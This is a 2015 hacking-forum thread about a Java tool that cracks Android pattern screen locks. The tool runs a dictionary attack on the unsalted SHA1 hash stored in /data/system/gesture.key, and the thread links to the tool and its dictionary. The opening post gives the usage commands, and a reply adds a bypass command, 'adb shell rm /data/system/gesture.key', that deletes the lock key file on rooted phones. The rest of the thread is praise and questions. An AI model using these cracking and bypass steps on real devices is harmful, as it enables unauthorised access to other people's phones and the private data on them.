[Tool] Android Screenlock Gesture Crack
#1
AndroidGestureCrack

Cracks Android Screenlock Gesture Pattern using dictionary Attack

Description

A Java tool to crack the Gesture Screenlock pattern of an Android Phone. Android's pattern lock contains a SHA1 hash of the pattern in a gesture.key file in /data/system folder in the internal memory of the android. It has been tested on Android API Level 15 and up, but should work with lower versions as well. As long as you extract the gesture.key file this tool will work well. The key is a SHA1 hash of the sequence of bytes of the pattern. The hash is unsalted and hence very easy to crack. The code uses the dictionary which you can download from the link below:-

Download Dictionary

Usage

You need to get the gesture.key file from android hidden system folder and extract the dictionary file from link above. Use them in the following way:

Code:
java -jar AndroidGestureCrack.jar --gui
                   or
java -jar AndroidGestureCrack.jar gesture.key AndroidGestureSHA1.txt

Sample Run

[Image: WJICRtw.png]

[Image: 687474703a2f2f692e696d6775722e636f6d2f72...4c2e706e67]

Note: There are scopes to improve the GUI (I haven't used any layouts in general but if you make some changes then let me know.)

Project Link: https://github.com/AnimeshShaw/AndroidGestureCrack
Download Latest release: https://github.com/AnimeshShaw/AndroidGe...eCrack.jar

You Require Java 8 to compile the code

Reply
#2
Very nice find! Surprised how easy this can be done :O
Reply
#3
(10-22-2015, 11:38 AM)Hackzors Wrote: Very nice find! Surprised how easy this can be done :O

Thanks Smile

This is not knew though, it can also be done if you can remove the gesture.key, for example on a rooted phone if you enable usb debugging and connect it to your pc and use adb to remove the file then also you can bypass it. In such case you can to simple choose a single gesture point. We can do the following:-

Code:
adb shell rm /data/system/gesture.key
Reply
#4
(10-22-2015, 12:12 PM)Psycho_Coder Wrote:
(10-22-2015, 11:38 AM)Hackzors Wrote: Very nice find! Surprised how easy this can be done :O

Thanks Smile

This is not knew though, it can also be done if you can remove the gesture.key, for example on a rooted phone if you enable usb debugging and connect it to your pc and use adb to remove the file then also you can bypass it. In such case you can to simple choose a single gesture point. We can do the following:-

Code:
adb shell rm /data/system/gesture.key

So when you delete the gesture.key, the phone won't need a unlock patern at all? Or can you just randomly press a pattern, and it will work?
Wouldn't the system have some sort of protection for this?
Reply
#5
(10-22-2015, 12:17 PM)Hackzors Wrote:
(10-22-2015, 12:12 PM)Psycho_Coder Wrote:
(10-22-2015, 11:38 AM)Hackzors Wrote: Very nice find! Surprised how easy this can be done :O

Thanks Smile

This is not knew though, it can also be done if you can remove the gesture.key, for example on a rooted phone if you enable usb debugging and connect it to your pc and use adb to remove the file then also you can bypass it. In such case you can to simple choose a single gesture point. We can do the following:-

Code:
adb shell rm /data/system/gesture.key

So when you delete the gesture.key, the phone won't need a unlock patern at all? Or can you just randomly press a pattern, and it will work?
Wouldn't the system have some sort of protection for this?

That used to be the case, once the keyfile was removed the phone would accept any gesture and save that to the gesture.key file. Not sure if this is still the case though as I read bout this method some time ago and there have been many updates since then. I have a rooted tablet so will play around with it a little tonight and see for myself.
Reply
#6
(10-22-2015, 11:38 AM)Hackzors Wrote: Very nice find! Surprised how easy this can be done :O

I would like to note that Psycho probably actually wrote this code and didn't "find" it. He's a very talented programmer and seems to get all sorts of interesting inspirations, like this one.
Reply
#7
(10-22-2015, 06:05 PM)NO-OP Wrote:
(10-22-2015, 11:38 AM)Hackzors Wrote: Very nice find! Surprised how easy this can be done :O

I would like to note that Psycho probably actually wrote this code and didn't "find" it.  He's a very talented programmer and seems to get all sorts of interesting inspirations, like this one.

Yes, I would give my thanks to the site that developed the dictionary. We can create the dictionary ourselves as well but its just a bit time consuming nothing more. Moreover I have mentioned the details in my description too Smile

I will improve the code to make it more robust and make do things more. Thanks for the input ^_^
Reply
#8
Nice job Psycho_Coder, I had no idea you could even do this in the first place (Find the pass-code). I'm going to try this on my tablet when I have time Smile
Reply
#9
(10-22-2015, 10:09 PM)Insider Wrote: Nice job Psycho_Coder, I had no idea you could even do this in the first place (Find the pass-code). I'm going to try this on my tablet when I have time Smile

Thanks, btw I have always been associated with InfoSec. It is just that when I was with bigger forums like HC or HS then there were already 100s of threads for different InfoSec topics and programming always didn't get much attention and hence I focused on that. But now since this forum is a bud that is growing nicely so I wanted to nourish it a bit with my little experience. Thats all!!! Smile Smile
Reply
#10
Made little changes to the main code and added an executable jar.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  First Attempt at Android Programming Psycho_Coder 4 27,827 01-07-2017, 07:06 AM
Last Post: Psycho_Coder
  [Tool] PsychoHasher - All purpose hashing utility Psycho_Coder 3 25,250 03-09-2016, 02:42 AM
Last Post: Vector